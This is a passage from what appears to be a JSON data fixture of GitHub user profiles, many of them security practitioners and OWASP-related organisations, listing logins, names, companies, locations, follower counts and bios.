"2024-09-11T22:15:47.838Z", + "name": "", + "login": "muzahm", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5666233?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2013-10-11T17:27:37Z", + "updated_at": "2016-02-27T11:39:21Z", + "node_id": "MDQ6VXNlcjU2NjYyMzM=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 909, + "fields": { + "nest_created_at": "2024-09-11T22:15:52.425Z", + "nest_updated_at": "2024-09-22T18:32:32.544Z", + "name": "Andrew Carter", + "login": "AndrewCarterUK", + "email": "andrewcarter1992@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/6486835?v=4", + "company": "@SmarterDM ", + "location": "United Kingdom", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 209, + "public_gists_count": 13, + "public_repositories_count": 94, + "created_at": "2014-01-23T23:50:03Z", + "updated_at": "2024-06-24T22:28:37Z", + "node_id": "MDQ6VXNlcjY0ODY4MzU=", + "bio": "Software Developer, Physics Graduate, BJJ Enthusiast and Amateur Photographer.", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 910, + "fields": { + "nest_created_at": "2024-09-11T22:15:58.321Z", + "nest_updated_at": "2024-09-22T18:32:29.948Z", + "name": "Chris Cornutt", + "login": "enygma", + "email": "enygma@github.com", + "avatar_url": "https://avatars.githubusercontent.com/u/66796?v=4", + "company": "", + "location": "Whitefish, Montana", + "collaborators_count": 0, + "following_count": 175, + "followers_count": 332, + "public_gists_count": 29, + "public_repositories_count": 103, + "created_at": "2009-03-25T01:29:36Z", + "updated_at": "2024-08-11T20:30:58Z", + "node_id": "MDQ6VXNlcjY2Nzk2", + "bio": "Senior AppSec Engineer, Product Security @ GitHub.\r\nWriter of codes.\r\nProtector of applications.\r\nBeer snob.", + "is_hireable": false, + "twitter_username": "enygma" + } +}, +{ + "model": "github.user", + "pk": 911, + "fields": { + "nest_created_at": "2024-09-11T22:16:03.120Z", + "nest_updated_at": "2024-09-22T18:32:39.549Z", + "name": "Ken Johnson", + "login": "cktricky", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/544667?v=4", + "company": "@github ", + "location": "", + "collaborators_count": 0, + "following_count": 164, + "followers_count": 175, + "public_gists_count": 34, + "public_repositories_count": 47, + "created_at": "2011-01-02T22:41:40Z", + "updated_at": "2024-09-09T10:23:30Z", + "node_id": "MDQ6VXNlcjU0NDY2Nw==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 912, + "fields": { + "nest_created_at": "2024-09-11T22:16:04.395Z", + "nest_updated_at": "2024-09-22T18:32:40.209Z", + "name": "Mike McCabe", + "login": "mccabe615", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1463253?v=4", + "company": "Cloud Security Partners", + "location": "Reston, VA", + "collaborators_count": 0, + "following_count": 34, + "followers_count": 64, + "public_gists_count": 84, + "public_repositories_count": 66, + "created_at": "2012-02-22T22:09:52Z", + "updated_at": "2024-09-03T15:15:06Z", + "node_id": "MDQ6VXNlcjE0NjMyNTM=", + "bio": "", + "is_hireable": false, + "twitter_username": "mccabe615" + } +}, +{ + "model": "github.user", + "pk": 913, + "fields": { + "nest_created_at": "2024-09-11T22:16:09.695Z", + "nest_updated_at": "2024-09-22T18:32:40.521Z", + "name": "Joe Mastey", + "login": "jmmastey", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/302011?v=4", + "company": "", + "location": "Chicago IL", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 82, + "public_gists_count": 52, + "public_repositories_count": 34, + "created_at": "2010-06-10T16:25:45Z", + "updated_at": "2024-06-10T23:36:06Z", + "node_id": "MDQ6VXNlcjMwMjAxMQ==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 914, + "fields": { + "nest_created_at": "2024-09-11T22:16:10.985Z", + "nest_updated_at": "2024-09-11T22:16:10.985Z", + "name": "LongCat", + "login": "pich4ya", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2099767?v=4", + "company": "Siam Thanat Hack", + "location": "Bangkok, Thailand", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 106, + "public_gists_count": 121, + "public_repositories_count": 48, + "created_at": "2012-08-05T20:58:03Z", + "updated_at": "2024-03-03T04:26:22Z", + "node_id": "MDQ6VXNlcjIwOTk3Njc=", + "bio": "Will Hack for Free Shabu Shabu.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 915, + "fields": { + "nest_created_at": "2024-09-11T22:16:11.865Z", + "nest_updated_at": "2024-09-22T18:32:39.855Z", + "name": "John Poulin", + "login": "nvisium-john-poulin", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/26073088?v=4", + "company": "@nVisium ", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 6, + "public_gists_count": 1, + "public_repositories_count": 3, + "created_at": "2017-02-27T21:53:10Z", + "updated_at": "2018-12-04T14:12:14Z", + "node_id": "MDQ6VXNlcjI2MDczMDg4", + "bio": "Director of Engineering @nVisium. Aka @forced-request", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 916, + "fields": { + "nest_created_at": "2024-09-11T22:16:28.192Z", + "nest_updated_at": "2024-09-11T22:16:28.192Z", + "name": "Aslan Dukaev", + "login": "dukaev", + "email": "github@dukaev.com", + "avatar_url": "https://avatars.githubusercontent.com/u/6534897?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 18, + "followers_count": 50, + "public_gists_count": 8, + "public_repositories_count": 25, + "created_at": "2014-01-29T13:15:50Z", + "updated_at": "2024-09-07T15:41:23Z", + "node_id": "MDQ6VXNlcjY1MzQ4OTc=", + "bio": "Developer and Hacker", + "is_hireable": true, + "twitter_username": "adukv" + } +}, +{ + "model": "github.user", + "pk": 917, + "fields": { + "nest_created_at": "2024-09-11T22:16:29.056Z", + "nest_updated_at": "2024-09-11T22:16:29.056Z", + "name": "Joel Brewer", + "login": "joelbrewer", + "email": "joel@brewerdigital.com", + "avatar_url": "https://avatars.githubusercontent.com/u/2348386?v=4", + "company": "Brewer Digital", + "location": "Colorado", + "collaborators_count": 0, + "following_count": 36, + "followers_count": 16, + "public_gists_count": 78, + "public_repositories_count": 36, + "created_at": "2012-09-14T17:47:42Z", + "updated_at": "2024-09-09T00:14:48Z", + "node_id": "MDQ6VXNlcjIzNDgzODY=", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 918, + "fields": { + "nest_created_at": "2024-09-11T22:16:29.884Z", + "nest_updated_at": "2024-09-11T22:16:29.884Z", + "name": "Daigham", + "login": "Daigham", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/20999399?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2016-08-12T21:30:08Z", + "updated_at": "2022-05-11T14:03:03Z", + "node_id": "MDQ6VXNlcjIwOTk5Mzk5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 919, + "fields": { + "nest_created_at": "2024-09-11T22:16:30.768Z", + "nest_updated_at": "2024-09-13T04:56:22.455Z", + "name": "Pranesh", + "login": "pmedilall", + "email": "pmedilall@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/4945275?v=4", + "company": "", + "location": "Sydney Australia", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 15, + "created_at": "2013-07-05T02:56:50Z", + "updated_at": "2023-04-24T02:30:43Z", + "node_id": "MDQ6VXNlcjQ5NDUyNzU=", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 920, + "fields": { + "nest_created_at": "2024-09-11T22:16:38.996Z", + "nest_updated_at": "2024-09-22T20:24:05.093Z", + "name": "Simon Bennetts", + "login": "psiinon", + "email": "psiinon@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1081115?v=4", + "company": "", + "location": "Online", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 619, + "public_gists_count": 0, + "public_repositories_count": 114, + "created_at": "2011-09-26T15:44:35Z", + "updated_at": "2024-07-16T09:54:56Z", + "node_id": "MDQ6VXNlcjEwODExMTU=", + "bio": "@zaproxy project lead.", + "is_hireable": false, + "twitter_username": "psiinon" + } +}, +{ + "model": "github.user", + "pk": 921, + "fields": { + "nest_created_at": "2024-09-11T22:16:41.502Z", + "nest_updated_at": "2024-09-11T22:16:42.328Z", + "name": "IriusRisk", + "login": "iriusrisk", + "email": "info@iriusrisk.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1478907?v=4", + "company": "", + "location": "Spain", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 40, + "public_gists_count": 0, + "public_repositories_count": 34, + "created_at": "2012-02-27T16:17:56Z", + "updated_at": "2024-08-21T15:11:31Z", + "node_id": "MDEyOk9yZ2FuaXphdGlvbjE0Nzg5MDc=", + "bio": "", + "is_hireable": false, + "twitter_username": "iriusrisk" + } +}, +{ + "model": "github.user", + "pk": 922, + "fields": { + "nest_created_at": "2024-09-11T22:16:50.759Z", + "nest_updated_at": "2024-09-11T22:16:50.759Z", + "name": "Jasper Wallace", + "login": "JasperWallace", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/634653?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 16, + "followers_count": 17, + "public_gists_count": 2, + "public_repositories_count": 26, + "created_at": "2011-02-23T20:08:07Z", + "updated_at": "2022-12-07T00:32:23Z", + "node_id": "MDQ6VXNlcjYzNDY1Mw==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 923, + "fields": { + "nest_created_at": "2024-09-11T22:16:52.055Z", + "nest_updated_at": "2024-09-22T19:29:40.752Z", + "name": "Elger Jonker", + "login": "stitch", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/333846?v=4", + "company": "", + "location": "Netherlands", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 11, + "public_gists_count": 0, + "public_repositories_count": 27, + "created_at": "2010-07-16T08:55:59Z", + "updated_at": "2024-04-21T14:46:50Z", + "node_id": "MDQ6VXNlcjMzMzg0Ng==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 924, + "fields": { + "nest_created_at": "2024-09-11T22:16:53.309Z", + "nest_updated_at": "2024-09-11T22:16:53.309Z", + "name": "", + "login": "reijin90", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6883646?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 2, + "public_gists_count": 1, + "public_repositories_count": 15, + "created_at": "2014-03-07T13:13:55Z", + "updated_at": "2024-08-10T22:53:10Z", + "node_id": "MDQ6VXNlcjY4ODM2NDY=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 925, + "fields": { + "nest_created_at": "2024-09-11T22:16:54.572Z", + "nest_updated_at": "2024-09-16T21:08:07.876Z", + "name": "Gustav", + "login": "kylak", + "email": "gustav7777777@icloud.com", + "avatar_url": "https://avatars.githubusercontent.com/u/16438248?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 23, + "followers_count": 5, + "public_gists_count": 7, + "public_repositories_count": 42, + "created_at": "2015-12-25T17:23:56Z", + "updated_at": "2024-09-04T09:35:09Z", + "node_id": "MDQ6VXNlcjE2NDM4MjQ4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 926, + "fields": { + "nest_created_at": "2024-09-11T22:16:55.919Z", + "nest_updated_at": "2024-09-22T19:29:38.221Z", + "name": "EnDe", + "login": "EnDe", + "email": "viele@public-files.de", + "avatar_url": "https://avatars.githubusercontent.com/u/103866?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 101, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2009-07-11T10:49:01Z", + "updated_at": "2024-06-24T20:14:42Z", + "node_id": "MDQ6VXNlcjEwMzg2Ng==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 927, + "fields": { + "nest_created_at": "2024-09-11T22:32:32.254Z", + "nest_updated_at": "2024-09-22T18:38:04.161Z", + "name": "RedRays", + "login": "redrays-io", + "email": "support@redrays.io", + "avatar_url": "https://avatars.githubusercontent.com/u/89958617?v=4", + "company": "", + "location": "United States of America", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 11, + "public_gists_count": 0, + "public_repositories_count": 15, + "created_at": "2021-09-02T04:07:24Z", + "updated_at": "2024-05-27T05:52:06Z", + "node_id": "MDEyOk9yZ2FuaXphdGlvbjg5OTU4NjE3", + "bio": "RedRays Security Platform", + "is_hireable": false, + "twitter_username": "redraysio" + } +}, +{ + "model": "github.user", + "pk": 928, + "fields": { + "nest_created_at": "2024-09-11T22:32:36.054Z", + "nest_updated_at": "2024-09-22T18:38:37.589Z", + "name": "OWASP Noir", + "login": "owasp-noir", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/150104587?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 13, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2023-11-07T03:50:35Z", + "updated_at": "2024-06-21T04:02:41Z", + "node_id": "O_kgDOCPJqCw", + "bio": "OWASP Noir is an open-source project, specializing in identifying attack surfaces for enhanced whitebox security testing and security pipeline.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 929, + "fields": { + "nest_created_at": "2024-09-11T22:32:55.279Z", + "nest_updated_at": "2024-09-22T20:30:25.453Z", + "name": "HAHWUL", + "login": "hahwul", + "email": "hahwul@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/13212227?v=4", + "company": "", + "location": "Republic of Korea (South)", + "collaborators_count": 0, + "following_count": 60, + "followers_count": 2378, + "public_gists_count": 27, + "public_repositories_count": 143, + "created_at": "2015-07-07T03:24:23Z", + "updated_at": "2024-09-02T12:16:11Z", + "node_id": "MDQ6VXNlcjEzMjEyMjI3", + "bio": "Offensive Security Engineer, Rubyist/Crystalist/Gopher and H4cker", + "is_hireable": false, + "twitter_username": "hahwul" + } +}, +{ + "model": "github.user", + "pk": 930, + "fields": { + "nest_created_at": "2024-09-11T22:32:57.517Z", + "nest_updated_at": "2024-09-22T18:44:05.341Z", + "name": "KSG", + "login": "ksg97031", + "email": "ksg97031@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/6715194?v=4", + "company": "", + "location": "Republic of Korea", + "collaborators_count": 0, + "following_count": 39, + "followers_count": 44, + "public_gists_count": 9, + "public_repositories_count": 89, + "created_at": "2014-02-18T11:45:45Z", + "updated_at": "2024-09-16T15:52:30Z", + "node_id": "MDQ6VXNlcjY3MTUxOTQ=", + "bio": "Security, Coding, Open Source", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 931, + "fields": { + "nest_created_at": "2024-09-11T22:33:53.289Z", + "nest_updated_at": "2024-09-22T18:38:48.330Z", + "name": "L3montree", + "login": "l3montree-dev", + "email": "info@l3montree.com", + "avatar_url": "https://avatars.githubusercontent.com/u/101948992?v=4", + "company": "", + "location": "Bonn", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 11, + "created_at": "2022-03-19T19:44:56Z", + "updated_at": "2024-05-18T13:11:40Z", + "node_id": "O_kgDOBhOeQA", + "bio": "DevSecOps made in Germany. Securing your Software Supply Chain and Cloud-Native Environment.", + "is_hireable": false, + "twitter_username": "l_3_montree" + } +}, +{ + "model": "github.user", + "pk": 932, + "fields": { + "nest_created_at": "2024-09-11T22:33:56.694Z", + "nest_updated_at": "2024-09-22T18:38:52.726Z", + "name": "Tim Bastin", + "login": "timbastin", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/38261809?v=4", + "company": "L3montree Cybersecurity", + "location": "Bonn", + "collaborators_count": 0, + "following_count": 9, + "followers_count": 16, + "public_gists_count": 11, + "public_repositories_count": 0, + "created_at": "2018-04-10T18:58:46Z", + "updated_at": "2024-09-06T12:40:30Z", + "node_id": "MDQ6VXNlcjM4MjYxODA5", + "bio": "https://gitlab.com/timbastin", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 933, + "fields": { + "nest_created_at": "2024-09-11T22:34:14.577Z", + "nest_updated_at": "2024-09-22T18:38:53.344Z", + "name": "Sebastian Kawelke", + "login": "seb-kw", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/66557440?v=4", + "company": "L3montree", + "location": "Germany", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2020-06-07T12:39:31Z", + "updated_at": "2024-09-19T07:07:37Z", + "node_id": "MDQ6VXNlcjY2NTU3NDQw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 934, + "fields": { + "nest_created_at": "2024-09-11T22:34:41.534Z", + "nest_updated_at": "2024-09-22T18:38:53.032Z", + "name": "", + "login": "Refoo0", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/148266382?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-10-17T17:37:31Z", + "updated_at": "2024-09-20T13:34:26Z", + "node_id": "U_kgDOCNZdjg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 935, + "fields": { + "nest_created_at": "2024-09-11T22:35:01.746Z", + "nest_updated_at": "2024-09-11T22:35:03.491Z", + "name": "", + "login": "devguard-app[bot]", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/in/923505?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2024-06-17T13:44:12Z", + "updated_at": "2024-07-07T12:21:47Z", + "node_id": "BOT_kgDOClDUwA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 936, + "fields": { + "nest_created_at": "2024-09-11T22:35:33.341Z", + "nest_updated_at": "2024-09-22T18:38:54.397Z", + "name": "OWASP Common Lifecycle Enumeration (CLE)", + "login": "Common-Lifecycle-Enumeration", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/102492483?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2022-03-28T00:00:32Z", + "updated_at": "2024-01-30T17:20:23Z", + "node_id": "O_kgDOBhvpQw", + "bio": "Open standard supporting software component aliasing, component lifecycle changes such as end-of-life and end-of-support, and provenance chaining over time.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 937, + "fields": { + "nest_created_at": "2024-09-11T22:35:37.300Z", + "nest_updated_at": "2024-09-22T18:38:58.376Z", + "name": "OWASP ModSecurity", + "login": "owasp-modsecurity", + "email": "modsecurity@owasp.org", + "avatar_url": "https://avatars.githubusercontent.com/u/157431874?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 75, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2024-01-22T23:43:12Z", + "updated_at": "2024-09-01T11:32:49Z", + "node_id": "O_kgDOCWI4Qg", + "bio": "ModSecurity - Open source WAF", + "is_hireable": false, + "twitter_username": "ModSecurity" + } +}, +{ + "model": "github.user", + "pk": 938, + "fields": { + "nest_created_at": "2024-09-11T22:35:41.433Z", + "nest_updated_at": "2024-09-13T05:23:38.305Z", + "name": "Ryan Barnett", + "login": "rcbarnett-zz", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/621352?v=4", + "company": "Akamai Threat Research Team", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 31, + "public_gists_count": 5, + "public_repositories_count": 4, + "created_at": "2011-02-16T15:00:52Z", + "updated_at": "2020-04-23T23:53:28Z", + "node_id": "MDQ6VXNlcjYyMTM1Mg==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 939, + "fields": { + "nest_created_at": "2024-09-11T22:35:41.832Z", + "nest_updated_at": "2024-09-22T19:48:28.839Z", + "name": "Felipe Zimmerle", + "login": "zimmerle", + "email": "felipe@felipe.wtf", + "avatar_url": "https://avatars.githubusercontent.com/u/428268?v=4", + "company": "", + "location": "Ontario, Canada", + "collaborators_count": 0, + "following_count": 65, + "followers_count": 309, + "public_gists_count": 41, + "public_repositories_count": 63, + "created_at": "2010-10-05T16:53:59Z", + "updated_at": "2024-08-14T02:31:53Z", + "node_id": "MDQ6VXNlcjQyODI2OA==", + "bio": "Security Researcher || libModSecurity author || PhD", + "is_hireable": true, + "twitter_username": "zimmerle" + } +}, +{ + "model": "github.user", + "pk": 940, + "fields": { + "nest_created_at": "2024-09-11T22:35:45.181Z", + "nest_updated_at": "2024-09-22T19:48:34.256Z", + "name": "Victor Hora", + "login": "victorhora", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/15767386?v=4", + "company": "@NCC Group", + "location": "Canada", + "collaborators_count": 0, + "following_count": 35, + "followers_count": 123, + "public_gists_count": 4, + "public_repositories_count": 15, + "created_at": "2015-11-10T06:27:05Z", + "updated_at": "2022-04-25T18:00:51Z", + "node_id": "MDQ6VXNlcjE1NzY3Mzg2", + "bio": "Senior Security Consultant at NCC Group and co-maintainer of the ModSecurity project.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 941, + "fields": { + "nest_created_at": "2024-09-11T22:35:58.913Z", + "nest_updated_at": "2024-09-22T18:39:29.118Z", + "name": "Justin Gerace", + "login": "spectrumjade", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/705937?v=4", + "company": "Meta", + "location": "Irvine, CA", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 19, + "public_gists_count": 0, + "public_repositories_count": 24, + "created_at": "2011-04-02T21:17:00Z", + "updated_at": "2023-04-30T01:19:54Z", + "node_id": "MDQ6VXNlcjcwNTkzNw==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 942, + "fields": { + "nest_created_at": "2024-09-11T22:36:03.585Z", + "nest_updated_at": "2024-09-22T18:39:09.746Z", + "name": "Marc Stern", + "login": "marcstern", + "email": "marc.stern@approach-cyber.com", + "avatar_url": "https://avatars.githubusercontent.com/u/5736521?v=4", + "company": "Approach Cyber", + "location": "Belgium", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2013-10-21T10:39:52Z", + "updated_at": "2024-09-04T08:25:22Z", + "node_id": "MDQ6VXNlcjU3MzY1MjE=", + "bio": "Working in Cyber Security for 20+ years, currently at Approach-Cyber. WAF, Crypto, eID, IAM, SSDLC, Confidential Computing, ...", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 943, + "fields": { + "nest_created_at": "2024-09-11T22:36:08.958Z", + "nest_updated_at": "2024-09-11T22:36:08.958Z", + "name": "", + "login": "tailianos", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7323965?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2014-04-17T07:24:35Z", + "updated_at": "2015-11-10T08:12:43Z", + "node_id": "MDQ6VXNlcjczMjM5NjU=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 944, + "fields": { + "nest_created_at": "2024-09-11T22:36:15.284Z", + "nest_updated_at": "2024-09-11T22:36:15.284Z", + "name": "Stefano Angaran", + "login": "oniric85", + "email": "stefano.angaran@upyou.it", + "avatar_url": "https://avatars.githubusercontent.com/u/3330275?v=4", + "company": "@castoredc", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 7, + "public_gists_count": 1, + "public_repositories_count": 18, + "created_at": "2013-01-21T16:05:24Z", + "updated_at": "2024-08-19T10:47:08Z", + "node_id": "MDQ6VXNlcjMzMzAyNzU=", + "bio": "Software engineer, security addicted, geek.", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 945, + "fields": { + "nest_created_at": "2024-09-11T22:36:25.986Z", + "nest_updated_at": "2024-09-11T22:36:25.986Z", + "name": "Alex Schoenmaker", + "login": "sAnexeh", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7021925?v=4", + "company": "", + "location": "Netherlands", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2014-03-21T11:57:01Z", + "updated_at": "2023-05-15T14:05:29Z", + "node_id": "MDQ6VXNlcjcwMjE5MjU=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 946, + "fields": { + "nest_created_at": "2024-09-11T22:36:28.500Z", + "nest_updated_at": "2024-09-11T22:36:28.500Z", + "name": "Eric", + "login": "ekoome", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6114096?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2013-12-05T12:42:47Z", + "updated_at": "2024-09-03T11:49:12Z", + "node_id": "MDQ6VXNlcjYxMTQwOTY=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 947, + "fields": { + "nest_created_at": "2024-09-11T22:36:30.907Z", + "nest_updated_at": "2024-09-11T22:36:30.907Z", + "name": "Barry Pollard", + "login": "tunetheweb", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/10931297?v=4", + "company": "Google", + "location": "Cork, Ireland", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 282, + "public_gists_count": 13, + "public_repositories_count": 66, + "created_at": "2015-02-09T22:33:19Z", + "updated_at": "2024-09-07T07:56:43Z", + "node_id": "MDQ6VXNlcjEwOTMxMjk3", + "bio": "Web Performance Developer Advocate for the Google Chrome team.\r\nAuthor of “HTTP/2 in Action” published by Manning. @tunetheweb on Twitter", + "is_hireable": false, + "twitter_username": "tunetheweb" + } +}, +{ + "model": "github.user", + "pk": 948, + "fields": { + "nest_created_at": "2024-09-11T22:36:33.088Z", + "nest_updated_at": "2024-09-11T22:36:33.088Z", + "name": "", + "login": "TobiasGrave", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/11976093?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2015-04-16T09:35:47Z", + "updated_at": "2023-08-30T11:33:43Z", + "node_id": "MDQ6VXNlcjExOTc2MDkz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 949, + "fields": { + "nest_created_at": "2024-09-11T22:36:35.630Z", + "nest_updated_at": "2024-09-11T22:36:35.630Z", + "name": "", + "login": "npsferreira", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/12939494?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2015-06-17T16:41:50Z", + "updated_at": "2022-04-20T16:54:25Z", + "node_id": "MDQ6VXNlcjEyOTM5NDk0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 950, + "fields": { + "nest_created_at": "2024-09-11T22:36:40.865Z", + "nest_updated_at": "2024-09-11T22:36:40.865Z", + "name": "upwork.link", + "login": "odesk2dot2by", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7859007?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2014-06-11T10:42:37Z", + "updated_at": "2016-02-27T16:58:04Z", + "node_id": "MDQ6VXNlcjc4NTkwMDc=", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 951, + "fields": { + "nest_created_at": "2024-09-11T22:36:44.637Z", + "nest_updated_at": "2024-09-11T22:36:44.637Z", + "name": "Sam Hobbs", + "login": "sam-hobbs", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7817338?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2014-06-06T16:08:10Z", + "updated_at": "2020-07-31T09:02:39Z", + "node_id": "MDQ6VXNlcjc4MTczMzg=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 952, + "fields": { + "nest_created_at": "2024-09-11T22:36:48.045Z", + "nest_updated_at": "2024-09-22T19:48:15.343Z", + "name": "Walter Hop", + "login": "lifeforms", + "email": "", + 